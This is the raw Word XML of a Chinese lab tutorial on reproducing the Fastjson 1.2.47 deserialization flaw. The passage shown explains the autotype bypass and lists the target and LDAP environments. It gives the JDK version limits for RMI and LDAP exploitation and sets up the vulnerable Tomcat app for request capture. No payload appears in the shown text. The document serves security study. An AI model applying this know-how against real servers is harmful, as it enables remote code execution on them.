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A5710" w14:textId="3C9B10B0" w:rsidR="000C7B7A" w:rsidRDefault="00421BA8" w:rsidP="00421BA8">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00421BA8">
        <w:t>Fastjson1.2.47反序列化+环境搭建+漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DC129F" w14:textId="60D24F4C" w:rsidR="0081592D" w:rsidRPr="0081592D" w:rsidRDefault="0081592D" w:rsidP="0081592D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>uther:h1biki</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1903DBE8" w14:textId="01342201" w:rsidR="00421BA8" w:rsidRDefault="00421BA8" w:rsidP="00421BA8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞简介</w:t>
      </w:r>
      <w:r w:rsidR="00E71E02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480933B0" w14:textId="0CE6BCC3" w:rsidR="00E71E02" w:rsidRDefault="00E71E02" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E71E02">
        <w:t>fastjson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E71E02">
        <w:t xml:space="preserve"> 是阿里巴巴的开源JSON解析库，它可以解析 JSON 格式的字符串，支持将 Java Bean 序列化为 JSON 字符串，也可以从 JSON 字符串反序列化到 JavaBean。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE44043" w14:textId="07DCFE94" w:rsidR="00E71E02" w:rsidRPr="00E71E02" w:rsidRDefault="00E71E02" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00E71E02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E71E02">
        <w:t>Fastjson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E71E02">
        <w:t>提供了autotype功能，允许用户在反序列化数据中通过“@type”指定反序列化的类型，其次，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E71E02">
        <w:t>Fastjson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E71E02">
        <w:t>自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法，那么当组件开启了autotype功能并且反序列化不可信数据时，攻击者可以构造数据，使目标应用的代码执行流程进入特定类的特定setter或者getter方法中，若指定类的指定方法中有可被恶意利用的逻辑（也就是通常所指的“Gadget”），则会造成一些严重的安全问题。并且在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E71E02">
        <w:t>Fastjson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E71E02">
        <w:t xml:space="preserve"> 1.2.47</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71E02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及以下版本中，利用其缓存机制可实现对未开启</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71E02">
        <w:t>autotype功能的绕过。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C1A19F" w14:textId="6F146A00" w:rsidR="00421BA8" w:rsidRDefault="00421BA8" w:rsidP="00421BA8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复现环境</w:t>
      </w:r>
      <w:r w:rsidR="0081592D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DD1EE2" w14:textId="74723D97" w:rsidR="006F1795" w:rsidRDefault="006F1795" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶机环境：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5D7DF9" w14:textId="21F1E240" w:rsidR="006F1795" w:rsidRPr="00B2783B" w:rsidRDefault="006F1795" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00B2783B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统：</w:t>
      </w:r>
      <w:r w:rsidRPr="00B2783B">
        <w:t>win 10 64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62893278" w14:textId="46B4D23A" w:rsidR="006F1795" w:rsidRPr="00B2783B" w:rsidRDefault="006F1795" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00B2783B">
        <w:t>Tomcat：9.0.56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8E371F" w14:textId="7A0C58BA" w:rsidR="006F1795" w:rsidRPr="00B2783B" w:rsidRDefault="006F1795" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B2783B">
        <w:t>fastjson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B2783B">
        <w:t>：1.2.47</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3385A5" w14:textId="7413115E" w:rsidR="0081592D" w:rsidRDefault="006F1795" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00B2783B">
        <w:lastRenderedPageBreak/>
        <w:t>JDK：1.8.0_181</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8E2A7A" w14:textId="77777777" w:rsidR="005949AA" w:rsidRDefault="005949AA" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A9519A6" w14:textId="1232E12A" w:rsidR="00DC25E7" w:rsidRDefault="005949AA" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766D83C0" w14:textId="55E2ACFC" w:rsidR="005949AA" w:rsidRPr="00B2783B" w:rsidRDefault="005949AA" w:rsidP="005949AA">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00B2783B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2021.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67414438" w14:textId="77777777" w:rsidR="005949AA" w:rsidRDefault="005949AA" w:rsidP="005949AA">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00B2783B">
        <w:t>JDK：1.8.0_181</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F4B4C4" w14:textId="77777777" w:rsidR="005949AA" w:rsidRDefault="005949AA" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FEBAF2C" w14:textId="5FF1DB81" w:rsidR="005949AA" w:rsidRDefault="005949AA" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击环境;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7EC664" w14:textId="1367DA6A" w:rsidR="005949AA" w:rsidRPr="00B2783B" w:rsidRDefault="005949AA" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随意</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAADC41" w14:textId="0203EB0A" w:rsidR="00280707" w:rsidRDefault="00280707" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00B2783B">
        <w:t>注意</w:t>
      </w:r>
      <w:r w:rsidR="004A2BA4" w:rsidRPr="00B2783B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003555F6" w:rsidRPr="00B2783B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据J</w:t>
      </w:r>
      <w:r w:rsidR="003555F6" w:rsidRPr="00B2783B">
        <w:t>DK</w:t>
      </w:r>
      <w:r w:rsidR="003555F6" w:rsidRPr="00B2783B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本的不同,</w:t>
      </w:r>
      <w:r w:rsidR="003555F6" w:rsidRPr="00B2783B">
        <w:t>所使用的服务也不同</w:t>
      </w:r>
      <w:r w:rsidR="003555F6" w:rsidRPr="00B2783B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003555F6" w:rsidRPr="00B2783B">
        <w:t>其对应的</w:t>
      </w:r>
      <w:r w:rsidR="003555F6" w:rsidRPr="00B2783B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidR="003555F6" w:rsidRPr="00B2783B">
        <w:t>DK版本如下</w:t>
      </w:r>
      <w:r w:rsidR="007972DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，务必选择合适的J</w:t>
      </w:r>
      <w:r w:rsidR="007972DE">
        <w:t>DK</w:t>
      </w:r>
      <w:r w:rsidR="007972DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5151DF0A" w14:textId="59052180" w:rsidR="007A38D7" w:rsidRPr="007A38D7" w:rsidRDefault="007A38D7" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="007A38D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反序列化常用的两种利用方式，一种是基于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>rmi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>，一种是基于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>。RMI是一种行为，指的是Java远程方法调用。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>指轻量级目录访问协议。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC099BD" w14:textId="5C46F2D9" w:rsidR="007A38D7" w:rsidRPr="007A38D7" w:rsidRDefault="007A38D7" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>Rmi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>与</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>存在java版本限制：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FE5D5F" w14:textId="28DF6811" w:rsidR="007A38D7" w:rsidRPr="007A38D7" w:rsidRDefault="007A38D7" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="007A38D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>rmi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>的利用方式：适用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>jdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>版本：JDK 6u141, JDK 7u131, JDK 8u121之前。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD1009D" w14:textId="1DA829F9" w:rsidR="007A38D7" w:rsidRPr="007A38D7" w:rsidRDefault="007A38D7" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="007A38D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="007A38D7">
        <w:t>jdk8u122的时候，加入了反</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>序列化白</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>名单的机制，关闭了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>rmi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>远程加载代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D004CD" w14:textId="575EE81C" w:rsidR="007A38D7" w:rsidRPr="007A38D7" w:rsidRDefault="007A38D7" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="007A38D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>的利用方式：适用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>jdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>版本：JDK 11.0.1、8u182、7u191、6u201之前。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51055B0D" w14:textId="6EFB4BEB" w:rsidR="007A38D7" w:rsidRPr="007A38D7" w:rsidRDefault="007A38D7" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="007A38D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="007A38D7">
        <w:t>Java 8u191更新中，Oracle对LDAP向量设置了相同的限制，并发布了CVE-2018-3149，关闭了JNDI远程类加载。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5C86B8" w14:textId="5582F244" w:rsidR="007A38D7" w:rsidRPr="007A38D7" w:rsidRDefault="007A38D7" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="007A38D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>的利用范围是比</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>rmi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>要大的，实战情况下推荐使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A38D7">
        <w:t>方法进行利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D55111" w14:textId="1B9073D3" w:rsidR="00280707" w:rsidRPr="0081592D" w:rsidRDefault="00280707" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="256B8FEC" wp14:editId="416ECE53">
            <wp:extent cx="5205722" cy="2501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91" cy="2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274D" w14:textId="348F67F4" w:rsidR="00421BA8" w:rsidRDefault="00421BA8" w:rsidP="00421BA8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:r w:rsidR="0081592D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C93D793" w14:textId="7C4E583E" w:rsidR="00B2783B" w:rsidRDefault="005628E2" w:rsidP="000E38B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将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>下载好的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Fastjson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>解压后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>放到Tomcat下的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>webapps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCF8E03" w14:textId="77777777" w:rsidR="005628E2" w:rsidRPr="005628E2" w:rsidRDefault="005628E2" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="005628E2">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="005628E2">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\_}(R3C[ZH{%@{35KRZ~1LVI.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="005628E2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BB42A1">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BB42A1">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\_}(R3C[ZH{%@{35KRZ~1LVI.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00BB42A1">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:instrText>INCLUDEPICTURE  "C:\\Users\\nsfocus\\Desktop\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\_}(R3C[ZH{%@{35KRZ~1LVI.png" \* MERGEFORMATINET</w:instrText>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:pict w14:anchorId="7B0C3E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1.75pt;height:112.5pt">
            <v:imagedata r:id="rId8" r:href="rId9"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00BB42A1">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005628E2">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="649C4858" w14:textId="1FC90C41" w:rsidR="005628E2" w:rsidRDefault="005628E2" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="005628E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用tomcat下的bin目录中的</w:t>
      </w:r>
      <w:r w:rsidRPr="005628E2">
        <w:t>startup.bat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启web服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042933C8" w14:textId="19C0CC2E" w:rsidR="005628E2" w:rsidRDefault="005628E2" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r w:rsidRPr="005628E2">
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="005628E2">
        <w:t>:8080/fastjson/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tomcat会回显Hello</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>orld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68395DCD" w14:textId="49DEA0B7" w:rsidR="005628E2" w:rsidRPr="005628E2" w:rsidRDefault="005628E2" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="005628E2">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="005628E2">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\AXQ[74TG9$)$N_@A070O9[N.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="005628E2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BB42A1">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BB42A1">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\AXQ[74TG9$)$N_@A070O9[N.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00BB42A1">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:instrText>INCLUDEPICTURE  "C:\\Users\\nsfocus\\Desktop\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\A</w:instrText>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:instrText>XQ[74TG9$)$N_@A070O9[N.png" \* MERGEFORMATINET</w:instrText>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00825154">
        <w:pict w14:anchorId="1334B611">
          <v:shape id="_x0000_i1026" type="#_x0000_t75" alt="" style="width:421.5pt;height:129pt">
            <v:imagedata r:id="rId10" r:href="rId11"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00BB42A1">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005628E2">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4950E62B" w14:textId="77777777" w:rsidR="00D427D8" w:rsidRDefault="00D427D8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2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功能:我们用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burp</w:t>
      </w:r>
      <w:r>
        <w:t>suit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24514220" w14:textId="206F93FB" w:rsidR="00D427D8" w:rsidRPr="00D427D8" w:rsidRDefault="00D427D8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00D427D8">
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D427D8">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\$0$LLUOS58YRLKMNX5ORN~5.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D427D8">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BB42A1">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BB42A1">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\$0$LLUOS58YRLKMNX5ORN~5.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00BB42A1">
